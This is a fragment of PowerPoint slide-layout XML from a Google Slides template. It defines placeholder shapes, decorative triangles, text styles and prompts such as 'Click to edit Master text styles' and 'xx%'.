        <p:nvSpPr>
          <p:cNvPr id="365" name="Google Shape;365;p50"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950967" y="707633"/>
            <a:ext cx="10281200" cy="70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4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366" name="Google Shape;366;p50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9884933" y="3309467"/>
            <a:ext cx="4541200" cy="4403200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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367" name="Google Shape;367;p50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="-1232733" y="-1805433"/>
            <a:ext cx="4541200" cy="4403200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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368" name="Google Shape;368;p50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="-2662300" y="-2647567"/>
            <a:ext cx="7153200" cy="33552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9" name="Google Shape;369;p50"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950967" y="1898867"/>
            <a:ext cx="10281200" cy="4346400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="609585" marR="67732" lvl="0" indent="-423323"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1219170" lvl="1" indent="-423323"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828754" lvl="2" indent="-423323"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2438339" lvl="3" indent="-423323"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3047924" lvl="4" indent="-423323"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3657509" lvl="5" indent="-423323"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4267093" lvl="6" indent="-423323"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4876678" lvl="7" indent="-423323" rtl="0">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5486263" lvl="8" indent="-423323" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2133"/>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pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1435824075"/>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hree columns 5">
  <p:cSld name="Title and three columns 5">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 370"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="371" name="Google Shape;371;p51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632400" y="707633"/>
            <a:ext cx="69272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372" name="Google Shape;372;p51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1712908" y="4360033"/>
            <a:ext cx="15464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373" name="Google Shape;373;p51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254108" y="4721593"/>
            <a:ext cx="2464000" cy="27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374" name="Google Shape;374;p51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8932692" y="4343300"/>
            <a:ext cx="15464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375" name="Google Shape;375;p51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8473892" y="4693476"/>
            <a:ext cx="2464000" cy="27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376" name="Google Shape;376;p51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5320029" y="4360033"/>
            <a:ext cx="15464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377" name="Google Shape;377;p51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4861229" y="4721593"/>
            <a:ext cx="2464000" cy="27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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="286852835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título " type="titleOnly">
  <p:cSld name="Solo título ">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent5"/>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1189400" y="707633"/>
            <a:ext cx="98132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32" name="Google Shape;32;p6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9366000" y="3467500"/>
            <a:ext cx="4541200" cy="4403200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">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33" name="Google Shape;33;p6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9505067" y="3467500"/>
            <a:ext cx="4541200" cy="4403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34" name="Google Shape;34;p6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="-1016567" y="-1220733"/>
            <a:ext cx="4541200" cy="4403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35" name="Google Shape;35;p6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="-2241867" y="-2030167"/>
            <a:ext cx="7153200" cy="33552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60821761"/>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accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 378"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="379" name="Google Shape;379;p52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5944916" y="-1257300"/>
            <a:ext cx="11000800" cy="10666400"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">
            <a:avLst/>
          </a:pr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380" name="Google Shape;380;p52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4413400" y="2596667"/>
            <a:ext cx="3365200" cy="26996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1" name="Google Shape;381;p52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713400" y="2596667"/>
            <a:ext cx="3365200" cy="26996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2" name="Google Shape;382;p52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8113400" y="2596667"/>
            <a:ext cx="3365200" cy="26996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3" name="Google Shape;383;p52"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="871599" y="4188233"/>
            <a:ext cx="3048800" cy="10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9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="384" name="Google Shape;384;p52"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4586232" y="4188233"/>
            <a:ext cx="3048800" cy="10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9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="Google Shape;385;p52"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8271601" y="4188233"/>
            <a:ext cx="3048800" cy="10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9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386" name="Google Shape;386;p52"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="784399" y="3290833"/>
            <a:ext cx="3223200" cy="10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5333" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buNone/>
              <a:defRPr sz="5333">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buNone/>
              <a:defRPr sz="5333">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buNone/>
              <a:defRPr sz="5333">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buNone/>
              <a:defRPr sz="5333">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buNone/>
              <a:defRPr sz="5333">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buNone/>
              <a:defRPr sz="5333">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buNone/>
              <a:defRPr sz="5333">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buNone/>
              <a:defRPr sz="5333">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>xx%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387" name="Google Shape;387;p52"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4484400" y="3290833"/>
            <a:ext cx="3223200" cy="10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5333" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buNone/>
              <a:defRPr sz="5333">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buNone/>
              <a:defRPr sz="5333">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buNone/>
              <a:defRPr sz="5333">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buNone/>
              <a:defRPr sz="5333">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buNone/>
              <a:defRPr sz="5333">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buNone/>
              <a:defRPr sz="5333">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buNone/>
              <a:defRPr sz="5333">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buNone/>
              <a:defRPr sz="5333">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>xx%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="388" name="Google Shape;388;p52"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="5" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8184401" y="3290833"/>
            <a:ext cx="3223200" cy="10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5333" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buNone/>
              <a:defRPr sz="5333">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buNone/>
              <a:defRPr sz="5333">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buNone/>
              <a:defRPr sz="5333">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buNone/>
              <a:defRPr sz="5333">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buNone/>
              <a:defRPr sz="5333">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buNone/>
              <a:defRPr sz="5333">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buNone/>
              <a:defRPr sz="5333">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buNone/>
              <a:defRPr sz="5333">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>xx%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389" name="Google Shape;389;p52"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632400" y="707633"/>
            <a:ext cx="69272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390" name="Google Shape;390;p52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9559600" y="3189233"/>
            <a:ext cx="4541200" cy="4403200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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391" name="Google Shape;391;p52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="-1016567" y="-1576333"/>
            <a:ext cx="4541200" cy="4403200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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392" name="Google Shape;392;p52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="-2241867" y="-2385767"/>
            <a:ext cx="7153200" cy="33552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90114029"/>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umbers and text 1">
  <p:cSld name="Numbers and text 1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="dk1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 393"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394" name="Google Shape;394;p53"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951000" y="1686172"/>
            <a:ext cx="10290000" cy="48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9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="395" name="Google Shape;395;p53"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950969" y="853095"/>
            <a:ext cx="10290000" cy="10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000"/>
              <a:buNone/>
              <a:defRPr sz="6667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buNone/>
              <a:defRPr sz="6667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buNone/>
              <a:defRPr sz="6667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buNone/>
              <a:defRPr sz="6667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buNone/>
              <a:defRPr sz="6667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
